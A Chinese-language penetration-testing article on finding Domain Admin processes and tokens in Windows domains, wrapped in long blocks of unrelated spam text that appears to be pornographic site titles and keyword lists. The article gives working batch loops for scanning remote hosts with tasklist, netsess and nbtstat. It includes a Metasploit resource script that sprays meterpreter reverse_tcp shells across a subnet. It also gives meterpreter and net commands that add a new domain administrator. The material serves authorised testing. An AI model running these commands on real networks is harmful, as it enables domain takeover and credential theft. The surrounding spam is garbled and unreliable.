精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

五種尋找 "Domain Admin" 運行的進程的方法

新聞
當計算機加入到域后,默認將"Domain Admin"組賦予了本地系統管理員的權限。也就是說,在計算機添加到域,成為域的成員主機的過程中,系統將會自動把"Domain Admin"域組添加到本地的Administrators組中。因此,只要是Domain Admin組的成員均可訪問本地計算機,而且具備"完全控制"的權限。

前言

當計算機加入到域后,默認將"Domain Admin"組賦予了本地系統管理員的權限。也就是說,在計算機添加到域,成為域的成員主機的過程中,系統將會自動把"Domain Admin"域組添加到本地的Administrators組中。因此,只要是Domain Admin組的成員均可訪問本地計算機,而且具備"完全控制"的權限。

[[231721]]

因此對于滲透測試人員來說,把"Domain Admin"域組添加到本地的Administrators組中是他們模擬域管理員帳戶操作的常用方式。不過前提是,他們需要知道這些進程正在運行的系統。在本文中,五種尋找 "Domain Admin" 運行的進程的方法,其中涉及的技術包括:

1.本地檢查;

2.查詢活動域用戶會話的域控制器;

3.掃描運行任務的遠程系統;

4.掃描NETBIOS協議信息的遠程系統

5.用于令牌驗證的PSExec Shell噴灑遠程系統

獲取域管理權限

本文在大多數情況下,都將重點關注運行域管理進程的系統。不過即便如此,我還是要介紹一下很多滲透測試人員用來獲取域管理員權限的標準過程。

1.識別目標系統和應用程序;

2.識別潛在的漏洞;

3.利用漏洞獲取初始訪問權限;

4.升級受感染系統的權限;

5.在本地或遠程系統上找到域管理進程或身份驗證令牌;

6.通過發送本地管理員的密碼哈希,破解密碼或使用mimikatz這樣的工具來轉儲密碼,來對運行域管理進程的遠程系統進行身份驗證;

7.進入到域管理過程;

8.創建一個域管理;

以上過程是滲透測試的通用步驟,所以沒有必要值得多介紹。如果你對細節感興趣,網上都有大量的教材。

查找域管理進程

以下就是我在網絡上查到的查找域管理進程的5種技術。

技術1:本地檢查

請務必首先檢查最初被破壞的系統,如果你已經存在于域管理進程中,那么在網絡上運行真的沒什么意義了。以下是使用本機命令檢查是否有任何域管理進程正在運行的簡單方法:

1.運行以下命令以獲取域管理員列表:net group “Domain Admins” /domain;

2.運行Tasklist /v命令以列出進程和進程用戶,運行該過程的帳戶應該在第7列;

3.將任務列表與域管理員列表交叉引用,查看你是否進入域管理進程中;

如果域管理進程始終是在最初受到攻擊的系統上運行,那就太好了,但這屬于理想的情況。所以接下來的四種技術將幫助你在各種情況下的遠程域系統上找到域管理進程。

技巧2:查詢域控制器的活動域用戶會話

據我所知,這項技術是安全公司Netspi的原創技術。我們需要一種用來識別活動的域管理進程和登錄,而不是在整個網絡上執行shell噴灑或執行任何會引發“入侵檢測系統”的掃描。最終,我發現只需簡單地查詢以獲取一個活動域用戶會話列表即可,然后將該列表與域管理列表交叉引用。唯一可能出現問題的環節,就是你必須查詢所有的域控制器。下面是我提供的一些基本步驟,以獲得具有域用戶權限的活動域管理會話的系統列表。

1.使用LDAP查詢或net命令從“域控制器”OU中收集域控制器的列表,以下是我用過的一個net命令:

  1. net group “Domain Controllers” /domain 

請注意:雖然OU是域控制器列表的最佳來源,但前提是,你要對受信任域完成枚舉并監控這些域控制器的過程。或者,你可以通過DNS查找它們:Nslookup –type=SRV _ldap._tcp.

2.使用LDAP查詢或net命令從“域管理員”組中收集域管理員的列表。以下是我用過的一個net命令:

  1. net group “Domain Admins” /domain 

3.通過使用Netsess.exe查詢每個域控制器,收集所有活動域會話的列表。 Netsess工具是Joe Richards提供的一個很棒的工具,它里面包含了本地Windows函數“netsessionenum”。該函數可以返回活動會話的IP地址、域帳戶、會話啟動時間和空閑時間。以下是我用過的一個net命令:

  1. Netsess.exe –h 

4.將Domain Admin列表與活動會話列表交叉引用,以確定哪些IP地址上有活動的域令牌。在更安全的環境中,你可能需要等待具有域管理員權限的域管理員或服務帳戶在網絡上執行此操作。不過這意味著我需要多次運行這個過程,或者把它編寫出來。下面是一個使用了netsess的非??焖俸途哂泄袅Φ腤indows命令行腳本。

  1. FOR /F %i in (dcs.txt) do @echo [+] Querying DC %i && @netsess -h %i 2>nul > sessions.txt &&  
  2. FOR /F %a in (admins.txt) DO @type sessions.txt | @findstr /I %a 

不過請注意,dcs.txt有一個域控制器列表,admins.txt有一個Domain Admins列表。

為此,我編寫了一個名為Get Domain Admins(GDA)的基本批處理腳本,它可以自動下載整個過程。readme文件中列出了其中的依賴關系,我還為Windows Dictionary攻擊創建了一個名為Get Domain Users(GDU)的批處理文件,它具有和Get Domain Admins(GDA)相似的選項,不過具有更多的依賴關系。如果你感興趣,可點擊上面的鏈接下載。

技術3:掃描用于運行任務的遠程系統

通常情況下,前兩種方法已足以保證我取得成功。然而,山外有山,這第三種技術,就是我在LaNMSteR53的博客上看到的,我認為這是一個聰明的方法。當你在域系統上作為共享的本地管理員帳戶運行時,就可以通過以下的腳本來掃描系統域管理任務。與以上的技術類似,你需要首先枚舉Domain Admins。在下面的腳本中,ips.txt包含目標系統的列表,而names.txt包含域管理員的列表。

  1. FOR /F %i in (ips.txt) DO @echo [+] %i && @tasklist /V /S %i /U user /P password 2>NUL > output.txt && 
  2. FOR /F %n in (names.txt) DO @type output.txt | findstr %n > NUL && echo [!] %n was found running a process on %i && pause 

技術4:掃描NetBIOS信息的遠程系統

某些Windows系統仍然允許用戶通過NetBIOS查詢查詢登錄用戶,你可以使用本機nbtstat工具查詢信息,在nbtstat結果中,用戶名由“<03>”表示。

1.下面是另一個快速而具有攻擊的Windows命令行腳本,它將掃描遠程系統,找到活動的Domain Admins會話。注意:該腳本可以作為非域用戶運行。

  1. for /F %i in (ips.txt) do @echo [+] Checking %i && nbtstat -A %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i 

2.你也可以使用運行速度稍快的nbtscan工具,下面是另一個基本的腳本命令:

  1. for /F %i in (ips.txt) do @echo[+] Checking %i && nbtscan -f %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i 

技術5:用于身份驗證令牌遠程系統的PSExec Shell噴灑技術

Psexec“Shell spray”是在Metasploit中的Psexec模塊的數百個系統上安裝Shell(通常是meterpreter),從而使用共享的本地管理憑證。許多測試人員使用此方法與其他Metasploit功能一起來識別域管理令牌。雖然這是我最不喜歡的技術,但由于pentest社區的很多人都在積極使用它,我覺得我需要把它包括進來。不過,在運行環境中同時啟動500個shell可能會導致客戶的系統運行出現問題。確切的說,擁有500個shell意味著你可以更快地獲取數據。下面是我見過很多人使用的步驟:

1.安裝Metasploit 3.5及其以上版本;

2.將下面的腳本復制到一個文本文件中,并保存到Metasploit目錄中作為psexec_spray.rc,它是我最初在Jabra的博客上發現的腳本。

  1. #Setup Multi Handler to accept multiple incoming connections use multi/handler setg PAYLOAD windows/meterpreter/reverse_tcp setg LHOST 0.0.0.0 setg LPORT 55555 set ExitOnSession false exploit -j -z 

#Setup憑證使用windows/smb/psexec設置SMBPass。

#Setup域作為本地主機,只有使用域憑據才能設置SMBDomain。在#Disable有效載荷處理程序的psexec模塊中(使用多處理程序)用set DisablePayloadHandler true #Run Ruby代碼掃描所需網絡范圍的使用的REX API屬性:

  1. range walker #note: could also accept ip addresses from a file by replacing rhosts =”192.168.74.0/24” with rhosts = File.readlines(“c:systems.txt”) require ‘rex/socket/range_walk 

3.更新smbuser和smbpass參數;

4.發出msfconsole –r psexec_spray.rc命令來運行該腳本。psexec_spray.rc腳本將嘗試使用所提供的憑證在每個系統的192.168.1.0/24網絡中隨意安裝meterpreter shell。

5.然后,你可以使用Metasploit模塊中的token_hunter來識別每個帶shell

系統上的域管理令牌。步驟如下:

5.1 創建一個包含Domain Admins列表的文件,如下所示:COMPANYjoe-admin COMPANYbill-admin COMPANYdavid-admin

5.2 在msfconsole msf> load token_hunter中加載token_hunter模塊;

5.3 運行令牌捕獲工具來列出包含域管理令牌的會話 msf> token_hunt_user -f /tmp/domain-admin.txt

6.或者,可以使用Sessions –s loggedin

命令從每個帶shell的系統中獲取當前登錄用戶的列表,并手動查找Domain Admins。

添加新的域管理員

如果你已經獲取了meterpreter會話,則可以使用隱身模式來模擬域管理員,或者添加新的域管理員。隱身模式可以嘗試通過遍歷系統中所有可用的授權令牌來隨意添加新的域管理員。下面是在meterpreter中執行該操作的基本命令。

1.使用load incongnito命令在你的活動meterpreter會話中加載隱身模式;

2.嘗試利用以下命令,在系統上添加具有身份驗證令牌的域管理員:

  1. add_user -h  
  2. add_group “”Domain Admins”” -h 

如果你有興趣使用其他選項創建新的域管理員,則可以使用以下說明:

1.在meterpreter控制臺中,輸入PS命令以查看進程;

2.在meterpreter控制臺中,通過migrate命令找到域管理會話并進行遷移;

3.在meterpreter控制臺中,輸入shell命令獲取OS shell;

4.輸入以下本機Windows命令來添加新的域管理員:

  1. net user /add /domain  
  2. net group “Domain Admins” /add /domain 

總結

正如本文所述,有很多選項可用于識別域管理進程和身份驗證令牌。我建議使用對系統影響較低的方法,相信隨著時間的推移,人們會想出更好的想法。

責任編輯:武曉燕 來源: 4hou
相關推薦

2023-10-11 09:00:00

2020-08-26 14:44:05

CDNIP子域名

2019-11-27 10:36:11

進程通信IPC

2023-06-26 20:33:47

開源代碼

2022-12-29 08:46:15

IT采購投資

2009-06-18 09:03:58

Unix關機

2022-12-07 11:24:51

首席信息官IT

2009-07-03 17:48:24

JSP頁面跳轉

2025-04-25 08:55:00

Pod運維

2020-11-16 15:51:54

Kubernetes

2023-11-21 15:23:15

JavaScript工具

2022-01-10 06:52:59

查詢MySQL字段

2011-05-18 13:37:26

LINQ

2021-08-13 11:21:16

KubernetesKubectlLinux

2022-07-14 08:47:02

IT供應商入庫

2021-10-20 14:38:27

物聯網災難恢復IOT

2011-04-21 10:08:34

2021-11-02 07:54:40

List分片Java

2022-11-23 13:46:02

云支出云計算

2015-09-10 09:30:54

Java多線程同步
點贊
收藏

51CTO技術棧公眾號

免费a视频在线观看| 日本xxxx黄色| 男人久久精品| 日韩精品乱码免费| 色视频www在线播放国产成人 | 日韩欧美小视频| 国产精品一品视频| 青青久久aⅴ北条麻妃| 少妇高潮惨叫久久久久| 日韩黄色av| 91成人在线精品| 欧美日韩dvd| 国产免费视频在线| 国产成人超碰人人澡人人澡| 国产精品69久久| avove在线播放| 精品久久不卡| 337p日本欧洲亚洲大胆精品| 午夜免费福利在线| cao在线视频| 亚洲欧洲日本在线| 日本一区二区三区免费观看| 丰满少妇被猛烈进入| 美女高潮久久久| 2019日本中文字幕| 久久精品人妻一区二区三区| 99国产**精品****| 亚洲日韩欧美视频| 手机在线成人av| 美女久久精品| 欧美日韩精品一区视频| 乱子伦视频在线看| sm捆绑调教国产免费网站在线观看| 1000部国产精品成人观看| 欧美日韩在线一二三| 无码国产精品高潮久久99| 国产成人亚洲综合a∨婷婷图片| 国产日韩换脸av一区在线观看| 性色av免费观看| 一本不卡影院| 久久免费视频网| 中国毛片直接看| 国产大片一区| 日韩色av导航| 992在线观看| 久久视频在线| 中文字幕亚洲综合久久| 色屁屁草草影院ccyy.com| 久久爱www成人| 精品亚洲aⅴ在线观看| 六十路息与子猛烈交尾| 欧美日韩看看2015永久免费| 亚洲国内精品在线| 亚洲综合自拍网| 日韩影视高清在线观看| 精品视频久久久| 国产ts在线播放| 国产一区二区三区电影在线观看| 亚洲欧洲日产国码av系列天堂 | 国产欧美一区二区三区在线看蜜臀| 久久涩涩网站| 激情小视频在线| 久久久久一区二区三区四区| 欧美一进一出视频| 在线观看国产原创自拍视频| 中文字幕日韩欧美一区二区三区| 国产麻豆电影在线观看| 国产在线高清视频| 一区二区三区**美女毛片| 男人日女人视频网站| 在线黄色的网站| 欧美午夜电影网| 激情文学亚洲色图| 都市激情久久| 亚洲欧美日韩在线一区| 免费成人深夜蜜桃视频 | 国自产拍偷拍精品啪啪一区二区| 亚洲精品中文字幕| 精品视频免费在线| 亚洲精品乱码久久久久久9色| a级日韩大片| 亚洲人成免费电影| 国产黄色小视频网站| 激情综合视频| 国产精品v日韩精品| 91久久国语露脸精品国产高跟| 国产乱码精品1区2区3区| 国产精品免费在线播放| 精品美女视频在线观看免费软件 | 亚洲午夜精品久久久| 国产一区二区在线免费观看| 国产欧美日韩综合一区在线观看| 久久天堂电影| 亚洲欧美一区二区三区极速播放| 秋霞无码一区二区| 久久不卡日韩美女| 精品福利一区二区三区免费视频| 熟女高潮一区二区三区| 亚洲精品中文字幕乱码| 欧美一级免费看| 一区二区日韩视频| av电影在线观看不卡| 亚洲欧洲中文| 日韩理论视频| 欧美一卡二卡在线观看| 女人又爽又黄免费女仆| 国产综合色产| 国产日韩欧美91| 天堂av在线免费观看| 亚洲日本在线天堂| 虎白女粉嫩尤物福利视频| 蜜桃在线一区| 国产一区二区三区在线播放免费观看| 久久久久久久久99| 蜜臀av性久久久久av蜜臀妖精| 国产精品国模大尺度私拍| 午夜在线小视频| 日韩欧中文字幕| 人妻av一区二区三区| 婷婷伊人综合| 国产精品美女www| 水莓100国产免费av在线播放| 国产精品入口麻豆原神| 免费在线观看日韩视频| 免费福利视频一区| 久久久久久久久亚洲| 国产欧美第一页| 亚洲国产精品激情在线观看| av黄色在线网站| 精品少妇一区| 欧美激情视频网站| 性生活视频软件| 亚洲女女做受ⅹxx高潮| www.com污| 天天操综合网| 国产一区二中文字幕在线看| 9191在线观看| 欧美日本一区二区三区四区| 国产又黄又粗视频| 日韩激情在线观看| 日韩中文一区二区三区| 日本精品不卡| 亚洲性av网站| 最近中文字幕在线观看| 欧美国产国产综合| 邪恶网站在线观看| 久久精品国产亚洲夜色av网站| 国产精品久久视频| 最新真实国产在线视频| 欧美色爱综合网| 娇小11一12╳yⅹ╳毛片| 久久99九九99精品| 亚洲精品偷拍视频| 中文字幕一区日韩精品| 欧美精品激情在线| 天天干天天爱天天操| 岛国av一区二区三区| 亚洲第一成人网站| 日本欧美一区二区三区乱码| 亚洲国产一区在线| 日韩a一级欧美一级| 惠美惠精品网| 亚洲色图五月天| 国产精品成人无码| 亚洲三级在线免费观看| 波多野吉衣在线视频| 99精品热视频只有精品10| 欧美二级三级| 欧美videos粗暴| 欧美大片欧美激情性色a∨久久| 亚洲黄色精品视频| 日韩欧美一区二区在线| 日韩中文字幕有码| 精品午夜一区二区三区在线观看 | 中文在线观看免费视频| 一区二区国产在线观看| 日韩国产美国| 亚洲精品一区二区在线播放∴| 欧美理论电影在线观看| 视频在线观看你懂的| 欧美日韩国产一二三| 特级片在线观看| www久久久久| 亚洲欧美日韩综合网| 欧美日韩少妇| 欧美在线激情| 亚洲一区网址| 国产精品久久久久久影视| 四虎亚洲成人| 在线播放日韩专区| 亚洲国产成人在线观看| 91国偷自产一区二区开放时间| 久草福利资源在线| 97国产一区二区| 57pao国产成永久免费视频| 亚洲国产裸拍裸体视频在线观看乱了中文| 欧美日韩另类丝袜其他| 欧美日本三级| 国产精品海角社区在线观看| 欧美性猛片xxxxx免费中国| 亚洲欧美精品suv| 精品国产九九九| 色婷婷久久久亚洲一区二区三区| 69xx绿帽三人行| 中文字幕欧美激情| 久久久老熟女一区二区三区91| 麻豆精品在线播放| 91国视频在线| 欧美精品aa| 中文字幕av日韩精品| 日韩大尺度在线观看| 97在线中文字幕| 色综合.com| 日本欧美在线视频| 9999热视频在线观看| 久久精品精品电影网| 国产尤物视频在线| 亚洲精品www| www夜片内射视频日韩精品成人| 在线观看视频一区二区欧美日韩| 国产精品1000| 一区二区在线观看av| 午夜国产福利视频| 久久久99久久| aaaaa一级片| 成人av第一页| 制服下的诱惑暮生| 九九在线精品视频| www.日本一区| 日韩电影网1区2区| 国产av无码专区亚洲精品| 亚洲人成高清| 日本欧美视频在线观看| 午夜精品国产| 经典三级在线视频| 亚洲啊v在线观看| 制服诱惑一区| 围产精品久久久久久久| 中文字幕欧美日韩一区二区三区| 欧美丝袜激情| 亚洲精品电影在线一区| 精品国产精品久久一区免费式| 欧美精品一区三区在线观看| 亚洲人亚洲人色久| 欧美国产视频在线观看| 天海翼精品一区二区三区| 精品婷婷色一区二区三区蜜桃| 久久九九热re6这里有精品| 国产精品免费在线播放| 牛牛视频精品一区二区不卡| 精品卡一卡二| 猛男gaygay欧美视频| 欧洲亚洲一区| 欧美3p在线观看| 精品国产无码在线| 亚洲欧美综合国产精品一区| 国产欧美久久久久| 激情自拍一区| 苍井空浴缸大战猛男120分钟| 久久亚洲国产精品一区二区| 色一情一乱一伦一区二区三区日本 | 九色porny自拍视频在线播放| 欧美激情欧美激情在线五月| 久久电影网站| 97人人爽人人喊人人模波多| 特黄毛片在线观看| 国产精品18久久久久久麻辣| 青青在线精品| 97国产超碰| 校花撩起jk露出白色内裤国产精品 | 免费欧美视频| 亚洲黄色成人久久久| 亚洲色图88| 少妇人妻大乳在线视频| 久久午夜电影| 伦伦影院午夜理论片| 不卡的av电影| 亚洲高潮女人毛茸茸| 亚洲免费在线看| 国产综合精品视频| 欧美在线你懂得| 精品黑人一区二区三区国语馆| 亚洲国产精品专区久久| 电影av一区| 日韩有码片在线观看| 丝袜美女在线观看| 日本在线精品视频| 欧美精品影院| 欧美不卡在线一区二区三区| 久久亚洲影视| 免费av手机在线观看| 日本美女视频一区二区| 精产国品一区二区三区| 久久九九99视频| 国模无码国产精品视频| 日本韩国精品在线| www.桃色av嫩草.com| 国产手机视频精品| 麻豆传媒视频在线观看| 性色av一区二区三区| 欧美亚洲黄色| 久久精品五月婷婷| 女同性一区二区三区人了人一 | 日韩经典一区二区三区| 日本三级视频在线播放| 555www成人网| 国产视频网站一区二区三区| 欧美日韩亚洲免费| 激情久久婷婷| 日本成人xxx| 国产欧美日韩精品一区| 日韩av电影网址| 欧美一区二区在线观看| 神马久久久久| 欧美黄色片视频| 亚洲男女网站| 污视频在线免费观看一区二区三区| 狠色狠色综合久久| 久久久久久久久久久久久久久国产| 久久综合av免费| 国产亚洲精品女人久久久久久| 欧美私模裸体表演在线观看| 婷婷国产在线| 久久免费视频观看| 亚洲啊v在线免费视频| 成年人黄色在线观看| 日本一不卡视频| 青青草视频成人| 欧美性感美女h网站在线观看免费| 超碰人人人人人人| 久久综合伊人77777| 四虎影视成人精品国库在线观看| 日本中文不卡| 日韩国产欧美三级| 日韩av一二区| 欧美日韩在线第一页| 人人妻人人澡人人爽人人欧美一区 | 无遮挡aaaaa大片免费看| 精品成人av一区| 午夜视频在线免费播放| 国产综合在线看| 精品午夜电影| 亚洲人精品午夜射精日韩| 高清不卡一二三区| 国产一卡二卡在线| 亚洲国产精品字幕| 在线免费三级电影网站| 免费观看国产成人| 久久久亚洲一区| 欧洲美一区二区三区亚洲| 欧美性受xxxx黑人xyx| 91视频在线观看| 国产精品中文字幕久久久| 欧美三级三级| 成人黄色一级大片| 亚洲天堂av一区| www.污视频| 国内揄拍国内精品少妇国语| 美国十次av导航亚洲入口| 国产中文字幕在线免费观看| 久久久综合九色合综国产精品| 日韩电影在线观看一区二区| 中文字幕精品久久| 五月天色综合| 青春草国产视频| 97精品超碰一区二区三区| 国产精品免费无遮挡无码永久视频| 亚洲午夜久久久久久久| www.久久久久爱免| aa视频在线播放| 国产欧美一区二区在线观看| 国产精品伊人久久 | 国产精品字幕| 91精品国产吴梦梦| 97se亚洲国产综合自在线不卡| 日日夜夜狠狠操| 美女999久久久精品视频| 国产香蕉精品| www.com黄色片| 亚洲综合一二三区| 欧美女同网站| 亚洲综合精品伊人久久| 在线综合视频| 国产色无码精品视频国产| 精品国产精品一区二区夜夜嗨| 韩日成人影院| 超碰免费在线公开| 99久久99久久精品免费观看| 中文字幕一区二区在线视频| 欧美激情高清视频| 欧美另类69xxxxx| 国产精品一级无码| 在线观看日韩国产| 国产xxx在线观看 | 成人欧美一区二区三区黑人免费| 亚洲深夜福利| 欧美一级特黄高清视频| 日韩av网站大全| 国产精品一区二区精品| 乱妇乱女熟妇熟女网站|